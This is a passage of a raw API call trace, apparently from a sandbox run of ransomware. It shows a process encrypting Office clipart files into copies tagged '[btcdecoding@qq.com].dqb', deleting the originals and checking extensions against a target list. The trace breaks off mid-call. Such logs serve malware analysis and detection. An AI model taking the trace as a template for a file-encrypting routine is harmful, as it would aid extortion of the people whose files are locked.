ReadFile (in: hFile=0x20c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.101] WriteFile (in: hFile=0x150, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.101] SetEndOfFile (hFile=0x150) returned 1 [0059.101] CloseHandle (hObject=0x150) returned 1 [0059.101] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.101] SetEndOfFile (hFile=0x20c) returned 1 [0059.102] CloseHandle (hObject=0x20c) returned 1 [0059.102] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.102] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00705_.wmf")) returned 1 [0059.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0059.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0059.102] lstrlenW (lpString=".doc") returned 4 [0059.102] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.102] lstrlenW (lpString=".docx") returned 5 [0059.102] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.102] lstrlenW (lpString=".pdf") returned 4 [0059.103] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.103] lstrlenW (lpString=".xls") returned 4 [0059.103] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.103] lstrlenW (lpString=".xlsx") returned 5 [0059.103] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.103] lstrlenW (lpString=".ppt") returned 4 [0059.103] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0059.103] lstrlenW (lpString=".zip") returned 4 [0059.103] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.103] lstrlenW (lpString=".rar") returned 4 [0059.103] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.103] lstrlenW (lpString=".bz2") returned 4 [0059.103] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.103] lstrlenW (lpString=".7z") returned 3 [0059.103] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0059.103] lstrlenW (lpString=".dbf") returned 4 [0059.103] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0059.103] lstrlenW (lpString=".1cd") returned 4 [0059.103] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 63 [0059.103] lstrlenW (lpString=".jpg") returned 4 [0059.103] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.103] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=2226) returned 1 [0059.103] CloseHandle (hObject=0x20c) returned 1 [0059.104] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf")) returned 0x20 [0059.104] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0059.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0059.104] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.104] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x150 [0059.104] GetLastError () returned 0x0 [0059.104] ReadFile (in: hFile=0x20c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x8b2, lpOverlapped=0x0) returned 1 [0059.106] WriteFile (in: hFile=0x150, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x8c0, lpOverlapped=0x0) returned 1 [0059.106] ReadFile (in: hFile=0x20c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.107] WriteFile (in: hFile=0x150, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.107] SetEndOfFile (hFile=0x150) returned 1 [0059.107] CloseHandle (hObject=0x150) returned 1 [0059.107] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.107] SetEndOfFile (hFile=0x20c) returned 1 [0059.108] CloseHandle (hObject=0x20c) returned 1 [0059.108] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.108] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf")) returned 1 [0059.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0059.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0059.108] lstrlenW (lpString=".doc") returned 4 [0059.108] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.108] lstrlenW (lpString=".docx") returned 5 [0059.108] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.108] lstrlenW (lpString=".pdf") returned 4 [0059.108] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.108] lstrlenW (lpString=".xls") returned 4 [0059.108] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.108] lstrlenW (lpString=".xlsx") returned 5 [0059.108] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.108] lstrlenW (lpString=".ppt") returned 4 [0059.108] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0059.108] lstrlenW (lpString=".zip") returned 4 [0059.108] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.108] lstrlenW (lpString=".rar") returned 4 [0059.109] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.109] lstrlenW (lpString=".bz2") returned 4 [0059.109] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.109] lstrlenW (lpString=".7z") returned 3 [0059.109] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0059.109] lstrlenW (lpString=".dbf") returned 4 [0059.109] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0059.109] lstrlenW (lpString=".1cd") returned 4 [0059.109] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0059.109] lstrlenW (lpString=".jpg") returned 4 [0059.109] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.109] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.109] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x150 [0059.110] GetLastError () returned 0x0 [0059.110] ReadFile (in: hFile=0x20c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x39e4, lpOverlapped=0x0) returned 1 [0059.111] WriteFile (in: hFile=0x150, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x39f0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x39f0, lpOverlapped=0x0) returned 1 [0059.112] ReadFile (in: hFile=0x20c, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.112] WriteFile (in: hFile=0x150, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.112] SetEndOfFile (hFile=0x150) returned 1 [0059.112] CloseHandle (hObject=0x150) returned 1 [0059.113] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.113] SetEndOfFile (hFile=0x20c) returned 1 [0059.113] CloseHandle (hObject=0x20c) returned 1 [0059.113] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.114] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf")) returned 1 [0059.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0059.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0059.114] lstrlenW (lpString=".doc") returned 4 [0059.114] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.114] lstrlenW (lpString=".docx") returned 5 [0059.114] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.114] lstrlenW (lpString=".pdf") returned 4 [0059.114] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.114] lstrlenW (lpString=".xls") returned 4 [0059.114] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.114] lstrlenW (lpString=".xlsx") returned 5 [0059.114] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.114] lstrlenW (lpString=".ppt") returned 4 [0059.114] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0059.114] lstrlenW (lpString=".zip") returned 4 [0059.114] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.114] lstrlenW (lpString=".rar") returned 4 [0059.114] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.114] lstrlenW (lpString=".bz2") returned 4 [0059.114] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.115] lstrlenW (lpString=".7z") returned 3 [0059.115] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0059.115] lstrlenW (lpString=".dbf") returned 4 [0059.115] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0059.115] lstrlenW (lpString=".1cd") returned 4 [0059.115] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0059.115] lstrlenW (lpString=".jpg") returned 4 [0059.115] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.284] GetFileSizeEx (in: hFile=0x150, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=3692) returned 1 [0059.294] CloseHandle (hObject=0x150) returned 1 [0059.294] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf")) returned 0x20 [0059.294] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0059.294] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x150 [0059.294] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.294] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.294] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0060.150] GetLastError () returned 0x0 [0060.150] ReadFile (in: hFile=0x150, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0xe6c, lpOverlapped=0x0) returned 1 [0060.151] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xe70, lpOverlapped=0x0) returned 1 [0060.152] ReadFile (in: hFile=0x150, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.152] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.152] SetEndOfFile (hFile=0x204) returned 1 [0060.153] CloseHandle (hObject=0x204) returned 1 [0060.153] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.153] SetEndOfFile (hFile=0x150) returned 1 [0060.153] CloseHandle (hObject=0x150) returned 1 [0060.153] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0060.154] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf")) returned 1 [0060.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0060.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0060.154] lstrlenW (lpString=".doc") returned 4 [0060.154] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.154] lstrlenW (lpString=".docx") returned 5 [0060.154] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.154] lstrlenW (lpString=".pdf") returned 4 [0060.154] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.154] lstrlenW (lpString=".xls") returned 4 [0060.154] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.154] lstrlenW (lpString=".xlsx") returned 5 [0060.154] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.154] lstrlenW (lpString=".ppt") returned 4 [0060.154] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0060.154] lstrlenW (lpString=".zip") returned 4 [0060.154] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.154] lstrlenW (lpString=".rar") returned 4 [0060.154] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.154] lstrlenW (lpString=".bz2") returned 4 [0060.154] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.154] lstrlenW (lpString=".7z") returned 3 [0060.154] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0060.154] lstrlenW (lpString=".dbf") returned 4 [0060.155] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0060.155] lstrlenW (lpString=".1cd") returned 4 [0060.155] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0060.155] lstrlenW (lpString=".jpg") returned 4 [0060.155] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.155] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.155] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0060.155] GetLastError () returned 0x0 [0060.156] ReadFile (in: hFile=0x150, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x760, lpOverlapped=0x0) returned 1 [0060.157] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x770, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x770, lpOverlapped=0x0) returned 1 [0060.158] ReadFile (in: hFile=0x150, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.158] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.158] SetEndOfFile (hFile=0x204) returned 1 [0060.158] CloseHandle (hObject=0x204) returned 1 [0060.158] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.158] SetEndOfFile (hFile=0x150) returned 1 [0060.163] CloseHandle (hObject=0x150) returned 1 [0060.163] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0060.163] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf")) returned 1 [0060.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0060.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0060.163] lstrlenW (lpString=".doc") returned 4 [0060.163] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.163] lstrlenW (lpString=".docx") returned 5 [0060.163] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.163] lstrlenW (lpString=".pdf") returned 4 [0060.164] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.164] lstrlenW (lpString=".xls") returned 4 [0060.164] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.164] lstrlenW (lpString=".xlsx") returned 5 [0060.164] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.164] lstrlenW (lpString=".ppt") returned 4 [0060.164] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0060.164] lstrlenW (lpString=".zip") returned 4 [0060.164] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.164] lstrlenW (lpString=".rar") returned 4 [0060.164] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.164] lstrlenW (lpString=".bz2") returned 4 [0060.164] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.164] lstrlenW (lpString=".7z") returned 3 [0060.164] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0060.164] lstrlenW (lpString=".dbf") returned 4 [0060.164] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0060.164] lstrlenW (lpString=".1cd") returned 4 [0060.164] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63 [0060.164] lstrlenW (lpString=".jpg") returned 4 [0060.164] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.164] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.165] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0060.165] GetLastError () returned 0x0 [0060.165] ReadFile (in: hFile=0x150, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0xed4, lpOverlapped=0x0) returned 1 [0060.174] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xee0, lpOverlapped=0x0) returned 1 [0060.175] ReadFile (in: hFile=0x150, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, 